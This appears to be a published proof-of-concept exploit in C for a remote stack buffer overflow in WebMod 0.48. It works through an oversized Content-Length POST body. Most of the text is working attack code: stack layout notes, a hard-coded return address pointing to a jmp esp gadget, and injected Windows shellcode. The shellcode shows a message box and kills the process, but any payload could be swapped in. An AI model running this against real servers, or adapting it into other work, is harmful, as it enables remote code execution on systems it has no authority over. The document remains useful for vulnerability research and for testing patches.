WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC

                                                /*
 * WebMod Stack Buffer Overflow
 *
 * by cybermind (Kevin Masterson)
 * [email protected]
 *
 * WebMod v0.48 exploit PoC code
 *
 */
#include&nbsp;<stdio.h>
#include&nbsp;<stdlib.h>
#include&nbsp;<string.h>

#define&nbsp;WIN32_LEAN_AND_MEAN
#include&nbsp;<windows.h>
#include&nbsp;<winsock.h>
#pragma&nbsp;comment&nbsp;(lib,&nbsp;\"ws2_32.lib\")

/*
local&nbsp;variables&nbsp;in&nbsp;connectHandle():

char&nbsp;*input;			4
char&nbsp;buf[8192+1];		8193
int&nbsp;i,j;			8
int&nbsp;connfd;			4
int&nbsp;myid;			4
threaddata_t&nbsp;*tdata;		4
httpquery_t&nbsp;query;		149036
char&nbsp;tmp[1025];			1025
int&nbsp;rcv;			4
char&nbsp;clbuf[11];			11

total:				158293
actual&nbsp;(due&nbsp;to&nbsp;padding):	158308


&nbsp;&nbsp;breakdown&nbsp;of&nbsp;types:
	typedef&nbsp;struct&nbsp;s_var&nbsp;{		546
	&nbsp;&nbsp;char&nbsp;name[33];		&nbsp;&nbsp;33
	&nbsp;&nbsp;char&nbsp;value[513];		&nbsp;&nbsp;513
	}&nbsp;var_s;


	typedef&nbsp;struct&nbsp;s_httpquery&nbsp;{	149036
	&nbsp;&nbsp;char&nbsp;method[11];		&nbsp;&nbsp;11
	&nbsp;&nbsp;char&nbsp;clientip[16];		&nbsp;&nbsp;16
	&nbsp;&nbsp;char&nbsp;url[257];		&nbsp;&nbsp;257
	&nbsp;&nbsp;char&nbsp;*get;			&nbsp;&nbsp;4
	&nbsp;&nbsp;char&nbsp;*post;			&nbsp;&nbsp;4
	&nbsp;&nbsp;char&nbsp;*cookies;		&nbsp;&nbsp;4
	&nbsp;&nbsp;var_s&nbsp;vars[256];		&nbsp;&nbsp;139776
	&nbsp;&nbsp;char&nbsp;currentmapname[257];	&nbsp;&nbsp;257
	&nbsp;&nbsp;char&nbsp;sendcookies[8192+1];	&nbsp;&nbsp;8193
	&nbsp;&nbsp;char&nbsp;contenttype[257];	&nbsp;&nbsp;257
	&nbsp;&nbsp;char&nbsp;location[257];		&nbsp;&nbsp;257
	}&nbsp;httpquery_t;
*/

//contains&nbsp;data&nbsp;to&nbsp;fill&nbsp;the&nbsp;Content-Length&nbsp;field&nbsp;with
char&nbsp;spambuf[20000];

//code&nbsp;to&nbsp;inject
//this&nbsp;particular&nbsp;code&nbsp;only&nbsp;works&nbsp;on&nbsp;Win2K&nbsp;SP4&nbsp;(v5.0.4.0)
//and&nbsp;kernel32.dll&nbsp;v5.0.2195.6688
unsigned&nbsp;char&nbsp;code[]&nbsp;=&nbsp;{
					//&nbsp;;&nbsp;push&nbsp;string&nbsp;onto&nbsp;the&nbsp;stack&nbsp;without&nbsp;using&nbsp;0x00
	0xB8,&nbsp;0x59,&nbsp;0x5A,&nbsp;0x32,&nbsp;0x11,	//mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eax,&nbsp;11325A59h&nbsp;;&nbsp;\"HI!\"&nbsp;+&nbsp;11111111h
	0x2D,&nbsp;0x11,&nbsp;0x11,&nbsp;0x11,&nbsp;0x11,	//sub&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eax,&nbsp;11111111h
	0x50,				//push&nbsp;&nbsp;&nbsp;&nbsp;eax
	0x8B,&nbsp;0xC4,			//mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eax,&nbsp;esp	&nbsp;;&nbsp;eax&nbsp;points&nbsp;to&nbsp;string

	0x33,&nbsp;0xC9,			//xor&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ecx,&nbsp;ecx	&nbsp;;&nbsp;zero

					//&nbsp;;&nbsp;call&nbsp;MessageBox
	0x51,				//push&nbsp;&nbsp;&nbsp;&nbsp;ecx		&nbsp;;&nbsp;flags&nbsp;(0)
	0x50,				//push&nbsp;&nbsp;&nbsp;&nbsp;eax		&nbsp;;&nbsp;caption
	0x50,				//push&nbsp;&nbsp;&nbsp;&nbsp;eax		&nbsp;;&nbsp;text
	0x51,				//push&nbsp;&nbsp;&nbsp;&nbsp;ecx		&nbsp;;&nbsp;hwnd&nbsp;(0)
	0xB8,&nbsp;0x98,&nbsp;0x80,&nbsp;0xE3,&nbsp;0x77,	//mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eax,&nbsp;77E38098h&nbsp;;&nbsp;&MessageBox
	0xFF,&nbsp;0xD0,			//call&nbsp;&nbsp;&nbsp;&nbsp;eax

					//&nbsp;;&nbsp;call&nbsp;GetCurrentProcessId
	0xB8,&nbsp;0xF4,&nbsp;0xB8,&nbsp;0x4E,&nbsp;0x7C,	//mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eax,&nbsp;7C4EB8F4h&nbsp;;&nbsp;&GetCurrentProcessId
	0xFF,&nbsp;0xD0,			//call&nbsp;&nbsp;&nbsp;&nbsp;eax

	0x33,&nbsp;0xC9,			//xor&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ecx,&nbsp;ecx	&nbsp;;&nbsp;zero

					//&nbsp;;&nbsp;call&nbsp;TerminateProcess
	0x51,				//push&nbsp;&nbsp;&nbsp;&nbsp;ecx		&nbsp;;&nbsp;return&nbsp;code&nbsp;(0)
	0x50,				//push&nbsp;&nbsp;&nbsp;&nbsp;eax		&nbsp;;&nbsp;process&nbsp;id
	0xB8,&nbsp;0xC3,&nbsp;0x8D,&nbsp;0x51,&nbsp;0x7C,&nbsp;&nbsp;&nbsp;//mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eax,&nbsp;7C518DC3h&nbsp;;&nbsp;&TerminateProcess
	0xFF,&nbsp;0xD0			//call&nbsp;&nbsp;&nbsp;&nbsp;eax

};

//EIP&nbsp;you&nbsp;want&nbsp;to&nbsp;insert,&nbsp;this&nbsp;points&nbsp;to&nbsp;an&nbsp;\"FF&nbsp;E4\"&nbsp;(jmp&nbsp;esp)&nbsp;in&nbsp;w_mm.dll
//set&nbsp;this&nbsp;to&nbsp;0xFFFFFFFF&nbsp;to&nbsp;just&nbsp;cause&nbsp;a&nbsp;crash
unsigned&nbsp;int&nbsp;our_eip&nbsp;=&nbsp;0x67E03C5B;

int&nbsp;main(int&nbsp;argc,&nbsp;char*&nbsp;argv[])&nbsp;{
	WSADATA&nbsp;wsadata;
	int&nbsp;sock&nbsp;=&nbsp;0;
	struct&nbsp;hostent*&nbsp;host&nbsp;=&nbsp;NULL;
	struct&nbsp;sockaddr_in&nbsp;saddr;

	//data&nbsp;to&nbsp;sent&nbsp;initially
	char&nbsp;initbuf[]&nbsp;=&nbsp;\"POST&nbsp;/&nbsp;HTTP/1.1
Host:&nbsp;localhost:27015
Content-Length:&nbsp;\";

	//data&nbsp;to&nbsp;send&nbsp;after&nbsp;headers
	char&nbsp;endbuf[]&nbsp;=&nbsp;\"

\";

	char*&nbsp;hostname&nbsp;=&nbsp;NULL;
	short&nbsp;hostport&nbsp;=&nbsp;27015;

	int&nbsp;i;
	unsigned&nbsp;int&nbsp;sent&nbsp;=&nbsp;0;

	//get&nbsp;host/port&nbsp;from&nbsp;command&nbsp;line
	if&nbsp;(argc&nbsp;<&nbsp;2)&nbsp;{
		printf(\"Usage:	%s&nbsp;<hostname|ip>&nbsp;[port=27015]
\",&nbsp;argv[0]);
		return&nbsp;1;
	}
	hostname&nbsp;=&nbsp;argv[1];
	if&nbsp;(argc&nbsp;>=&nbsp;3)&nbsp;hostport&nbsp;=&nbsp;atoi(argv[2]);

	WSAStartup(MAKEWORD(1,1),&nbsp;&wsadata);

	sock&nbsp;=&nbsp;socket(AF_INET,&nbsp;SOCK_STREAM,&nbsp;0);
	if&nbsp;(sock&nbsp;<=&nbsp;0)&nbsp;{
		printf(\"socket()&nbsp;error
\");
		return&nbsp;1;
	}

	host&nbsp;=&nbsp;gethostbyname(hostname);
	if&nbsp;(!host)&nbsp;{
		printf(\"gethostbyname()&nbsp;error
\");
		return&nbsp;1;
	}

	printf(\"Resolved&nbsp;\"%s\"&nbsp;to&nbsp;%s
\",&nbsp;hostname,&nbsp;inet_ntoa(*(struct&nbsp;in_addr*)host->h_addr_list[0]));

	memset(&saddr,&nbsp;0,&nbsp;sizeof(struct&nbsp;sockaddr_in));
	saddr.sin_family&nbsp;=&nbsp;AF_INET;
	saddr.sin_port&nbsp;=&nbsp;htons(hostport);
	memcpy(&saddr.sin_addr.s_addr,&nbsp;host->h_addr_list[0],&nbsp;host->h_length);

	if&nbsp;(connect(sock,&nbsp;(struct&nbsp;sockaddr*)&saddr,&nbsp;sizeof(struct&nbsp;sockaddr))&nbsp;<&nbsp;0)&nbsp;{
		printf(\"connect()&nbsp;error
\");
		return&nbsp;1;
	}

	//initialize&nbsp;buffers
	memset(spambuf,&nbsp;\'a\',&nbsp;sizeof(spambuf));

	//send&nbsp;initial&nbsp;POST&nbsp;request
	sent&nbsp;+=&nbsp;send(sock,&nbsp;initbuf,&nbsp;sizeof(initbuf)-1,&nbsp;0);

	//send&nbsp;7&nbsp;full&nbsp;spambufs&nbsp;to&nbsp;get&nbsp;140000&nbsp;bytes
	for&nbsp;(i&nbsp;=&nbsp;0;&nbsp;i&nbsp;<&nbsp;7;&nbsp;++i)
		sent&nbsp;+=&nbsp;send(sock,&nbsp;spambuf,&nbsp;sizeof(spambuf),&nbsp;0);

	//send&nbsp;partial&nbsp;spambuf&nbsp;to&nbsp;fill&nbsp;remaining&nbsp;data
	//(18308,&nbsp;this&nbsp;goes&nbsp;right&nbsp;up&nbsp;to&nbsp;the&nbsp;EIP)
	sent&nbsp;+=&nbsp;send(sock,&nbsp;spambuf,&nbsp;18308,&nbsp;0);

	//fill&nbsp;EIP
	sent&nbsp;+=&nbsp;send(sock,&nbsp;(char*)&our_eip,&nbsp;sizeof(our_eip),&nbsp;0);

	//insert&nbsp;code!
	sent&nbsp;+=&nbsp;send(sock,&nbsp;(char*)code,&nbsp;sizeof(code),&nbsp;0);

	//send&nbsp;newlines&nbsp;after&nbsp;content-length
	sent&nbsp;+=&nbsp;send(sock,&nbsp;endbuf,&nbsp;sizeof(endbuf)-1,&nbsp;0);

	printf(\"%u&nbsp;bytes&nbsp;sent...waiting...
\",&nbsp;sent);

	//wait&nbsp;for&nbsp;a&nbsp;while&nbsp;so&nbsp;the&nbsp;socket&nbsp;isn\'t&nbsp;closed&nbsp;on&nbsp;our&nbsp;end
	//before&nbsp;they&nbsp;receive&nbsp;all&nbsp;the&nbsp;data
	Sleep(15000);

	return&nbsp;0;
}

&nbsp;